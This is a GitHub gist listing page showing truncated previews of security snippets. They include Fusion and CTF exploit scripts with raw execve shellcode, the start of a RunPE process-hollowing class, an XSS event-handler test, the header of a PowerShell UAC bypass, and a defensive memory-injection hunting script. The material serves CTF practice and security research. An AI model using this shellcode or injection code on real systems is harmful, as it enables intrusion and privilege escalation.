Skip to content

Instantly share code, notes, and snippets.

View toufik-airane's full-sized avatar

Toufik Airane toufik-airane

308 followers · 172 following
View GitHub Profile
@soez
soez / fusion-level05.py
Created September 27, 2014 03:05
fusion-level05.py
from amnesia import *
from struct import pack, unpack
import time, sys
s = amnesiaSocket("127.0.0.1", 20005)
print s.readLine()
# base libc.so.6 0xb7e5f000
base = 0xb7e5f000
shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8" # dup2 by Nox & soez
@soez
soez / 2fusion-level05.py
Created December 7, 2014 21:55
2fusion-level05.py
# -*- encoding: utf-8 -*-
from amnesia import *
from struct import pack, unpack
import time, sys
##################################################################################
# Exploit configuration parameters.. Must be adjusted to the target system and app.
OFFSET_SAVED_EIP = 0xb7ffc848
PAGE_NUMBER_OF_NEXT_INSTRUCTION_TO_CALL = 2
OFFSET_TO_LIBC = 0x1a9000
@LordNoteworthy
LordNoteworthy / runpe
Created March 7, 2015 14:58
typedef LONG (WINAPI * NtUnmapViewOfSection)(HANDLE ProcessHandle, PVOID BaseAddress);
class runPE{
public:
void run(LPSTR szFilePath, PVOID pFile)
{
PIMAGE_DOS_HEADER IDH;
PIMAGE_NT_HEADERS INH;
PIMAGE_SECTION_HEADER ISH;
PROCESS_INFORMATION PI;
STARTUPINFOA SI;
@gerred
gerred / nodejs-cheatsheet.js
Last active August 29, 2015 14:21 — forked from LeCoupa/nodejs-cheatsheet.js
// Node.js CheatSheet.
// Download the Node.js source code or a pre-built installer for your platform, and start developing today.
// Download: http://nodejs.org/download/
// More: http://nodejs.org/api/all.html
// 0. Synopsis.
// http://nodejs.org/api/synopsis.html
@soez
soez / ctf_ekoparty_2015-pwn50_baby.py
Created October 23, 2015 21:49
from amnesia import *
from struct import pack, unpack
import time
p = lambda x: pack("<L", x)
u = lambda x: unpack('<L', x)[0]
shellcode = "\x6a\x04\x5b\x6a\x02\x59\x6a\x3f\x58\xcd\x80\x49\x79\xf8"
shellcode += "\x31\xc0\x99\x52\x68\x6e\x2f\x73"
shellcode += "\x68\x68\x2f\x2f\x62\x69\x89\xe3"
@indrora
indrora / 00readme.md
Last active November 12, 2021 07:24
DeadUpdate: Kickin' it bigtime.

... my first disclosure. Man, it feels weird doing this.

update 6/6/16 I would like to stress something: I'm not saying "Don't buy an ASUS device" -- I see a lot of people who want to lambaste ASUS for this and boycott their hardware. This isn't what I want people to be doing by any stretch. Stupidly, I like the ASUS hardware I have (it's nice for the price) and I would rather see a pressure on ASUS as an OEM to stop shipping "value added software" to consumers; If you want to help Microsoft in pushing this mentality, go buy a signature machine from them. Microsoft provides support, but also only ships windows and a few select utilities that are essential to the functioning of the system (think: Radeon/Optimus and nVidia control panels) and fall heavily on the hardware makers (ATI, nVidia, Intel) to provide support for the harware.

Consider an ASUS device all you want. Start putting pressure on Microsoft that consumers want bloat-free devices and start voting with your money. Microsoft's store

@stypr
stypr / README.md
Last active June 22, 2019 15:47
ASIS CTF 2016 Finals: pentest (298pt)

pentest (298pt)

Solves: 1

This write-up was made per request of other players who were playing ASIS CTF.

Note: I solved this challenge before the hint was released. \o/

Description

@rwestergren
rwestergren / html_test.html
Created December 13, 2016 16:34
HTML Email Filter Test
<a onafterprint="console.log(244599)" onbeforeprint="console.log(309354)" onbeforeunload="console.log(879813)" onerror="console.log(949564)" onhashchange="console.log(575242)" onload="console.log(301053)" onmessage="console.log(976974)" onoffline="console.log(796090)" ononline="console.log(432638)" onpagehide="console.log(504345)" onpageshow="console.log(696619)" onpopstate="console.log(398418)" onresize="console.log(943097)" onstorage="console.log(882233)" onunload="console.log(929443)" onblur="console.log(932104)" onchange="console.log(102339)" oncontextmenu="console.log(761265)" onfocus="console.log(188946)" oninput="console.log(143653)" oninvalid="console.log(304208)" onreset="console.log(318472)" onsearch="console.log(778420)" onselect="console.log(942035)" onsubmit="console.log(603589)" onkeydown="console.log(650647)" onkeypress="console.log(579383)" onkeyup="console.log(821763)" onclick="console.log(284098)" ondblclick="console.log(477370)" ondrag="console.log(439095)" ondragend="console.log(546684)" o
@jaredcatkinson
jaredcatkinson / Get-InjectedThread.ps1
Last active July 1, 2024 08:32
Code from "Taking Hunting to the Next Level: Hunting in Memory" presentation at SANS Threat Hunting Summit 2017 by Jared Atkinson and Joe Desimone
function Get-InjectedThread
{
<#
.SYNOPSIS
Looks for threads that were created as a result of code injection.
.DESCRIPTION
@tyranid
tyranid / bypass_uac.ps1
Last active July 11, 2024 12:27
# Powershell script to bypass UAC on Vista+ assuming
# there exists one elevated process on the same desktop.
# Technical details in:
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-1.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-2.html
# https://tyranidslair.blogspot.co.uk/2017/05/reading-your-way-around-uac-part-3.html
# You need to Install-Module NtObjectManager for this to run.
Import-Module NtObjectManager